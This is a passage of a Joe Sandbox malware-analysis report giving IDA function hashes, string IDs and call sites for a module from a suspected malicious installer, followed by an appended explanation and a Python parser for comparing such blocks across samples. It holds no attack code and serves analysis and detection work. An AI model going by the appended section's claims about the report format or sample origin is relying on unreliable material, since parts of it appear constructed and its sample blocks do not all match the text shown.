                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$hfJ
                              • API String ID: 3519838083-1391159562
                              • Opcode ID: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                              • Instruction ID: e9d5a61cac4402a3c8ebc840ce6ea2fc5010a63a59f752a059c282af89504a57
                              • Opcode Fuzzy Hash: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                              • Instruction Fuzzy Hash: 39916A70911358EFCB14DF99C9809DEFBF8BF19308F58451EE596A3A90D774AA88CB10
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CA18C5D
                                • Part of subcall function 6CA1761A: __EH_prolog.LIBCMT ref: 6CA1761F
                                • Part of subcall function 6CA17A2E: __EH_prolog.LIBCMT ref: 6CA17A33
                                • Part of subcall function 6CA18EA5: __EH_prolog.LIBCMT ref: 6CA18EAA
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: WZJ
                              • API String ID: 3519838083-1089469559
                              • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                              • Instruction ID: 3a3328d2ed2954b21b96a5fde5e1813dd24e127dba7746b4ec5aedb814581360
                              • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                              • Instruction Fuzzy Hash: 3C819F31D04258DFCF15DFA8DA90ADDB7B5AF18318F24405AE416B7B90DB30AE89CB60
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog__aullrem
                              • String ID: d%K
                              • API String ID: 3415659256-3110269457
                              • Opcode ID: ac62a312e9615e63fe83044f2985e6da76b9d9f2e0a1fb3315288c38c591097e
                              • Instruction ID: 76f7e529c025933b545fbcd87e815f7c49b4b2024562f91721dd737f3a525904
                              • Opcode Fuzzy Hash: ac62a312e9615e63fe83044f2985e6da76b9d9f2e0a1fb3315288c38c591097e
                              • Instruction Fuzzy Hash: E261C172A012099FDF01CF94C644BEE77F2AF45309F28C068D854AB641D771DD89CBA1
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: CK$CK
                              • API String ID: 3519838083-2096518401
                              • Opcode ID: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                              • Instruction ID: a78a762890db92c9f8abfd9bc5f44e8c1cadb0907eb51904565310110f2940c9
                              • Opcode Fuzzy Hash: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                              • Instruction Fuzzy Hash: E7516E75A003059FDB04CFA4C9C4BEEB3B5FF88359F188529D901EBB41DB75A9898B60
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: PdJ$Q
                              • API String ID: 3519838083-3674001488
                              • Opcode ID: 87eb3cb62c03194caae5458ff4b741e3c8b0552ef8959399e26f931c5ab5bbcd
                              • Instruction ID: af7561e59028b60afbefcc777bdec6d20f67e34842573f8cdeb5b7b46429a257
                              • Opcode Fuzzy Hash: 87eb3cb62c03194caae5458ff4b741e3c8b0552ef8959399e26f931c5ab5bbcd
                              • Instruction Fuzzy Hash: AC41D171D00269DBCF15DFA8C4A09DDB7B0FF49318F18C12AEA25A7A50C3349AC5CB94
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: 0|J$`)L
                              • API String ID: 3519838083-117937767
                              • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                              • Instruction ID: 9f4f2682d4a131d2476bc3f50201b41c7741a119c23fa7a3f929c81485f44514
                              • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                              • Instruction Fuzzy Hash: 0241B531605755EFCB128F64C4A07EEBFE2FF55248F04442EE06A97B50CB72A989CB51
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: __aulldiv
                              • String ID: 3333
                              • API String ID: 3732870572-2924271548
                              • Opcode ID: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                              • Instruction ID: 1ceb3b5107fb38c104b892e348b0bb114c33a5c09c26a71d82a1aebf0880cb32
                              • Opcode Fuzzy Hash: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                              • Instruction Fuzzy Hash: EA21BAB0900704AFD730CFA98991B6BBAFDEB44754F10891EA185D7B40D77099888B65
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$LuJ
                              • API String ID: 3519838083-205571748
                              • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                              • Instruction ID: bf4d914893da3c0ea9b1baa91e1338c70536f2023654d2cc8766398fdaf38991
                              • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                              • Instruction Fuzzy Hash: A001C0B2E01349DADB10DFE984905AEF7B4FF59358F40942EE069E3A40C3345988CB99
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$xMJ
                              • API String ID: 3519838083-951924499
                              • Opcode ID: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                              • Instruction ID: beb6a4a18987e0473419c302adc466ff4c7761483194c54261b92720ed9c0aad
                              • Opcode Fuzzy Hash: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                              • Instruction Fuzzy Hash: 28117C71E00209DBCB00DF99D49059EB7B4FF1838CB50C82ED469E7B01D3389A85CBA6
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: p/K$J
                              • API String ID: 3519838083-2069324279
                              • Opcode ID: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                              • Instruction ID: 33b992c7c35be0c49cfb7ce0c3b2743424f940fcbae780938efb47348e915b54
                              • Opcode Fuzzy Hash: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                              • Instruction Fuzzy Hash: CF01BCB2A117119FD724CF59D6043AAB7F8EF55729F10C81E9052A3B80C7F8A5488BA4
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CA3AFCC
                                • Part of subcall function 6CA3A4D1: __EH_prolog.LIBCMT ref: 6CA3A4D6
                                • Part of subcall function 6CA3914B: __EH_prolog.LIBCMT ref: 6CA39150
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: J$0J
                              • API String ID: 3519838083-2882003284
                              • Opcode ID: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                              • Instruction ID: 5b5d1b820dd7b3df870d12daf9118b5c6d207c29864f2d4d586f4133726c65e1
                              • Opcode Fuzzy Hash: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                              • Instruction Fuzzy Hash: 800105B1804B51CFC325CF65C5A428AFBF0BB15304F90C95EC0AA57B50D7B8A548CB68
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CA343F9
                                • Part of subcall function 6CA34320: __EH_prolog.LIBCMT ref: 6CA34325
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: `)L$|{J
                              • API String ID: 3519838083-2198066115
                              • Opcode ID: b90d896587ff69ee453e80d465c2f6f8c7b83dee329af48c731e2e2cf544007c
                              • Instruction ID: 062def226215821bef9b9916c6158bd6b2d6e2d2af9992cf683b6e75104fedd8
                              • Opcode Fuzzy Hash: b90d896587ff69ee453e80d465c2f6f8c7b83dee329af48c731e2e2cf544007c
                              • Instruction Fuzzy Hash: 42F08C72610114FFCB059F94DD05BDEBFB9FF49314F00802AF516A6650CBB66A58CB98
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prologctype
                              • String ID: <oJ
                              • API String ID: 3037903784-2791053824
                              • Opcode ID: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                              • Instruction ID: 793d666d96b5b8ce046547ead332752dcbbee8bc23728cf059cd3d5b2bafe0f2
                              • Opcode Fuzzy Hash: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                              • Instruction Fuzzy Hash: ACE0ED32A155209BDB049F08C820BDEF7A5EF50724F16001EE021A3B42CBB5AC448B80
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: D)K$H)K$P)K$T)K
                              • API String ID: 0-2262112463
                              • Opcode ID: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                              • Instruction ID: 970a4e69f41a8e543ca08959340e2992bed86e34f75034b1f4bf9f4c362dd0a7
                              • Opcode Fuzzy Hash: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                              • Instruction Fuzzy Hash: DA51D331904249AFCF01CF98D840BDEB7B1AF2531CF64841AE82267A91DB76D9BDCB50
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: (?K$8?K$H?K$CK
                              • API String ID: 0-3450752836
                              • Opcode ID: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                              • Instruction ID: 6f92d36400599ade425d20aae9da8c755e8ef32715455fd66aa525b1a6909149
                              • Opcode Fuzzy Hash: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                              • Instruction Fuzzy Hash: F9F01DB16117009FC3608F05D54869BB7F4EB41749F50C91EE09A9BA40D3B8A54C8FA8
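The blocks above are the raw per-function output of the Joe Sandbox IDA plugin for the module loaded at 6C9F8000 in process 6: each function carries an Opcode ID, an Instruction ID and two fuzzy hashes, plus the __EH_prolog call sites IDA resolved. Such blocks are most useful when they can be compared with the same output for a second sample. The following parser is an added example and is not part of the Joe Sandbox report or of the Joe Sandbox tooling. It assumes only the layout visible on this page (heading lines followed by "• Key: value" bullets, each block ending with the "Instruction Fuzzy Hash" bullet, and "API String ID" written as "<api hash>-<string hash>" with a 0 component where the corresponding ID is empty, as in the blocks with an empty API ID or String ID above). The sample input is copied from two blocks above; the function and field names are the example's own.

```python
"""Parse the 'Similarity' function blocks of a Joe Sandbox report (the text rendered above)
into records that can be indexed for cross-sample function matching."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

HEADINGS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
# "• Key: value", optionally prefixed with "Part of subcall function <addr>:" (APIs section)
BULLET = re.compile(r"^•\s*(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?([^:]+?):\s*(.*)$")
SOURCE = re.compile(r"^(\S+\.sdmp), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)$")

@dataclass
class FunctionRecord:
    api_refs: list = field(default_factory=list)  # (api, call-site address, subcall fn or None)
    source_file: str = ""                         # sdmp the function was lifted from
    base_address: int = -1                        # "Offset" of that dump
    snapshot: str = ""                            # .jbxd snapshot written by the IDA plugin
    fields: dict = field(default_factory=dict)    # Similarity key -> value ("" when empty)

def parse_blocks(text):
    """State machine over report lines; a block ends at its 'Instruction Fuzzy Hash' bullet."""
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADINGS:
            section = line
            continue
        m = BULLET.match(line)
        if not m:
            continue  # blank line or a non-bullet line this parser does not model
        subcall, key, value = m.group(1), m.group(2).strip(), m.group(3).strip()
        if section == "APIs":
            api = key[:-4] if key.endswith(" ref") else key  # "__EH_prolog.LIBCMT ref" -> api
            cur.api_refs.append((api, value, subcall))
        elif section == "Memory Dump Source" and key == "Source File":
            sm = SOURCE.match(value)
            cur.source_file, cur.base_address = sm.group(1), int(sm.group(2), 16)
        elif section == "Joe Sandbox IDA Plugin" and key == "Snapshot File":
            cur.snapshot = value
        elif section == "Similarity":
            cur.fields[key] = value
            if key == "Instruction Fuzzy Hash":  # last field of a block: emit the record
                records.append(cur)
                cur, section = FunctionRecord(), None
    if cur.fields:  # a block cut off by page truncation still yields what was captured
        records.append(cur)
    return records

def hash_pair(rec):
    """'API String ID' is '<api hash>-<string hash>'; a 0 component means that ID was empty."""
    api_hash, string_hash = rec.fields["API String ID"].split("-")
    return int(api_hash), int(string_hash)

def index_by_opcode_id(records):
    """Opcode ID -> records; the same ID in another sample's report marks a shared function body."""
    idx = defaultdict(list)
    for r in records:
        idx[r.fields["Opcode ID"]].append(r)
    return dict(idx)

def call_sites(records, api="__EH_prolog.LIBCMT"):
    """Sorted call-site addresses recorded for `api`, both direct and inside subcalls."""
    return sorted({int(addr, 16) for r in records for a, addr, _ in r.api_refs if a == api})

# Constructed input: two blocks copied from the report above, one with __EH_prolog call
# references and one whose API ID is empty, so both branches of hash_pair are exercised.
SAMPLE = """\
APIs
• __EH_prolog.LIBCMT ref: 6CA24ECC
  • Part of subcall function 6CA0F58A: __EH_prolog.LIBCMT ref: 6CA0F58F
Strings
Memory Dump Source
• Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
Similarity
• API ID: H_prolog
• String ID: :hJ$dJ$xJ
• API String ID: 3519838083-2437443688
• Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
• Instruction ID: f3a1ff7f142c0dbd2b406b1f300061c378c61d3d0fbb8d6f3a1c2a22ab494802
• Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
• Instruction Fuzzy Hash: 4721E9B1911B40CFC760CF6AC14428ABBF4FF29708B00C95EC0AA97B11D7B8A649CF59
Strings
Memory Dump Source
• Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
Similarity
• API ID:
• String ID: <J$DJ$HJ$TJ$]
• API String ID: 0-686860805
• Opcode ID: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
• Instruction ID: d4231186d39825dda7430359204efc90b4d074e1e702a701918e5f6c42464b0e
• Opcode Fuzzy Hash: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
• Instruction Fuzzy Hash: EC4187B0D09289AFCF14DFA1E4908EEB770AF21308B248259D13157F90DB35E68DCB11
"""
```

To compare two samples, run each report's text through parse_blocks and intersect the keys of the two index_by_opcode_id results: a shared Opcode ID is the strong signal (on this page the Opcode ID is identical to the Opcode Fuzzy Hash in every block, so the two fields are interchangeable for exact matching), while the Instruction Fuzzy Hash is the field to feed a fuzzy-hash distance for functions whose IDs differ. call_sites gives the concrete addresses in the 6C9F8000 module that a debugger breakpoint or a YARA offset check can be anchored to.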